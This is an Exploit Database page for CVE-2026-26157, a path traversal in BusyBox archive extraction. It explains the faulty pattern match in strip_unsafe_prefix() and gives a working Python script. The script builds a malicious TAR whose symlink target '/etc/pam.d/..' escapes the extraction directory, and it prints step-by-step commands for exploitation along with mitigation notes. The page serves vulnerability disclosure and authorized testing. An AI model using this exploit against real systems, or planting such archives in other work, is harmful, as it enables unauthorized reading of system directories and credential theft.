This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING BusyBox 1.37.0 - Path Traversal EDB-ID: 52538 CVE: 2026-26157 EDB Verified: Author: CALIL KHALIL Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-04-30 Vulnerable App: # Exploit Title: BusyBox 1.37.0 - Path Traversal # Google Dork: N/A # Date: 2026-02-11 # Exploit Author: Calil Khalil # Vendor Homepage: https://busybox.net # Software Link: https://busybox.net/downloads/ # Version: BusyBox 1.36.1, 1.37.0 # Tested on: Ubuntu 22.04 LTS, Alpine Linux 3.19 # CVE: CVE-2026-26157 """ BusyBox Path Traversal Vulnerability (CVE-2026-26157) Description: BusyBox archive extraction utilities fail to properly sanitize symlink targets containing trailing ".." components. The strip_unsafe_prefix() function in archival/libarchive/unsafe_prefix.c uses strstr(cp, "/../") which only matches the 4-character pattern and misses 3-character trailing "/.." sequences. This allows an attacker to craft malicious archives with symlinks pointing to arbitrary filesystem locations, enabling information disclosure through symlink traversal. Affected Components: - tar (primary vector) - unzip - rpm - ar Impact: - CVSS Score: 7.8 (HIGH) - Arbitrary file read via symlink traversal - Information disclosure - Credential theft Root Cause: archival/libarchive/unsafe_prefix.c:23 The pattern matching in strip_unsafe_prefix() fails on trailing ".." paths: cp2 = strstr(cp, "/../"); // Only matches "/../", misses "/pam.d/.." if (!cp2) break; Attack Scenario: 1. Attacker creates TAR archive with symlink: sensitive_data -> /etc/pam.d/.. 2. Victim extracts archive using BusyBox tar 3. Symlink created without sanitization 4. Symlink resolves to /etc directory 5. Application reading 'sensitive_data' exposes /etc contents References: - https://github.com/calilkhalil/research - Red Hat CNA Case: INC3907198 """ import tarfile import sys import os def create_exploit(): """ Creates a malicious TAR file exploiting CVE-2026-26157. The archive contains a symlink with an unsanitized target that resolves outside the extraction directory. """ exploit_file = 'CVE-2026-26157_exploit.tar' try: with tarfile.open(exploit_file, 'w') as tar: # Create symlink with trailing ".." in target path # This bypasses strip_unsafe_prefix() pattern matching info = tarfile.TarInfo('sensitive_data') info.type = tarfile.SYMTYPE info.linkname = '/etc/pam.d/..' # Resolves to /etc tar.addfile(info) print(f"[+] Exploit created: {exploit_file}") print(f"\n[*] Exploitation steps:") print(f" 1. mkdir test_extraction && cd test_extraction") print(f" 2. busybox tar xf ../{exploit_file}") print(f" 3. readlink -f sensitive_data") print(f" Expected output: /etc") print(f" 4. ls sensitive_data/") print(f" Result: Lists /etc directory contents") print(f"\n[!] Impact: Arbitrary directory read via symlink traversal") print(f"[!] CVSS: 7.8 HIGH (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)") return exploit_file except Exception as e: print(f"[-] Error creating exploit: {e}") sys.exit(1) def show_technical_details(): """Display technical analysis of the vulnerability""" print("\n" + "="*70) print("TECHNICAL ANALYSIS - CVE-2026-26157") print("="*70) print("\nVulnerable Function:") print(" archival/libarchive/unsafe_prefix.c:strip_unsafe_prefix()") print("\nVulnerable Code Pattern:") print(" cp2 = strstr(cp, \"/../\"); // Only matches 4-char sequence") print(" if (!cp2) break;") print("\nBypass Technique:") print(" Path: /etc/pam.d/..") print(" Pattern check: strstr(\"/etc/pam.d/..\", \"/../\") -> NULL") print(" Result: Sanitization bypassed, symlink created with original target") print("\nExploitation Flow:") print(" 1. Archive contains: symlink 'sensitive_data' -> '/etc/pam.d/..'") print(" 2. get_header_tar() extracts symlink metadata") print(" 3. Symlink target NOT sanitized (bypass detected)") print(" 4. data_extract_all() creates symlink with '/etc/pam.d/..'") print(" 5. Target resolves: /etc/pam.d/.. -> /etc") print(" 6. Reading 'sensitive_data' = reading /etc") print("="*70 + "\n") if __name__ == "__main__": print("="*70) print("BusyBox Path Traversal Exploit - CVE-2026-26157") print("Author: Calil Khalil") print("="*70) # Display technical analysis show_technical_details() # Create exploit exploit_file = create_exploit() print("\n[*] Mitigation:") print(" - Update BusyBox to patched version") print(" - Patch applies strip_unsafe_prefix() to symlink targets") print(" - Do not extract untrusted archives with elevated privileges") print("\n[*] For educational and authorized testing purposes only") Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.